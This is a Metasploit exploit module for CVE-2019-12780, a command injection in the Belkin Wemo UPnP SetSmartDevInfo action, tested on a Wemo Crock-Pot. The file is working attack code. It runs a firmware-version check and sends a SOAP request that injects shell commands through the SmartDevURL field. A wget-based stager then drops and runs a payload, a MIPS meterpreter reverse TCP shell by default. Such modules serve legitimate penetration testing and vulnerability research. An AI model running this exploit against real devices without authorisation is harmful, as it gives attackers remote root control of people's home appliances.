1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Belkin Wemo UPnP Remote Code Execution',
19
        'Description' => %q{
20
          This module exploits a command injection in the Belkin Wemo UPnP API via
21
          the SmartDevURL argument to the SetSmartDevInfo action.
22

23
          This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
24
          devices are known to be affected, albeit on a different RPORT (49153).
25
        },
26
        'Author' => [
27
          'phikshun', # Discovery, UFuzz, and modules
28
          'wvu',      # Crock-Pot testing and module
29
          'nstarke'   # Version-checking research and implementation
30
        ],
31
        'References' => [
32
          ['CVE', '2019-12780'],
33
          ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
34
          ['URL', 'https://github.com/phikshun/ufuzz'],
35
          ['URL', 'https://gist.github.com/phikshun/10900566'],
36
          ['URL', 'https://gist.github.com/phikshun/9984624'],
37
          ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
38
          ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
39
          ['URL', 'http://www.wemo.com/']
40
        ],
41
        'DisclosureDate' => '2014-04-04',
42
        'License' => MSF_LICENSE,
43
        'Privileged' => true,
44
        'Targets' => [
45
          [
46
            'Unix In-Memory',
47
            {
48
              'Platform' => 'unix',
49
              'Arch' => ARCH_CMD,
50
              'Type' => :unix_memory,
51
              'DefaultOptions' => {
52
                'PAYLOAD' => 'cmd/unix/generic'
53
              }
54
            }
55
          ],
56
          [
57
            'Linux Dropper',
58
            {
59
              'Platform' => 'linux',
60
              'Arch' => ARCH_MIPSLE,
61
              'Type' => :linux_dropper,
62
              'DefaultOptions' => {
63
                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
64
              }
65
            }
66
          ]
67
        ],
68
        'DefaultTarget' => 1,
69
        'Notes' => {
70
          'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
71
          'Stability' => [CRASH_SAFE],
72
          'SideEffects' => [ARTIFACTS_ON_DISK],
73
          'Reliability' => [REPEATABLE_SESSION]
74
        }
75
      )
76
    )
77

78
    register_options([
79
      Opt::RPORT(49152)
80
    ])
81

82
    register_advanced_options([
83
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
84
    ])
85
  end
86

87
  def check
88
    checkcode = CheckCode::Unknown
89

90
    res = send_request_cgi(
91
      'method' => 'GET',
92
      'uri' => '/setup.xml'
93
    )
94

95
    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
96
      vprint_error('Wemo-enabled device not detected')
97
      return checkcode
98
    end
99

100
    vprint_good('Wemo-enabled device detected')
101
    checkcode = CheckCode::Detected
102

103
    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
104
              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1))
105

106
    unless version
107
      vprint_error('Could not determine firmware version')
108
      return checkcode
109
    end
110

111
    vprint_status("Found firmware version: #{version}")
112

113
    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
114
    if version < Rex::Version.new('2.00.8643')
115
      vprint_good("Firmware version #{version} < 2.00.8643")
116
      checkcode = CheckCode::Appears
117
    else
118
      vprint_error("Firmware version #{version} >= 2.00.8643")
119
      checkcode = CheckCode::Safe
120
    end
121

122
    checkcode
123
  end
124

125
  def exploit
126
    case target['Type']
127
    when :unix_memory
128
      execute_command(payload.encoded)
129
    when :linux_dropper
130
      cmdstager = generate_cmdstager(
131
        flavor: :wget,
132
        temp: datastore['WritableDir'],
133
        file: File.basename(cmdstager_path),
134
        noconcat: true
135
      )
136

137
      # HACK: "chmod +x"
138
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
139
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
140
      cmdstager = cmdstager.join(';')
141

142
      vprint_status("Regenerated command stager: #{cmdstager}")
143
      execute_command(cmdstager)
144
    end
145
  end
146

147
  def execute_command(cmd, _opts = {})
148
    send_request_cgi(
149
      'method' => 'POST',
150
      'uri' => '/upnp/control/basicevent1',
151
      'ctype' => 'text/xml',
152
      'headers' => {
153
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
154
      },
155
      'data' => generate_soap_xml(cmd)
156
    )
157
  end
158

159
  def generate_soap_xml(cmd)
160
    <<~EOF
161
      <?xml version="1.0" encoding="utf-8"?>
162
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
163
        <s:Body>
164
          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
165
            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
166
          </u:SetSmartDevInfo>
167
        </s:Body>
168
      </s:Envelope>
169
    EOF
170
  end
171

172
  def cmdstager_path
173
    @cmdstager_path ||=
174
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
175
  end
176

177
end
178

179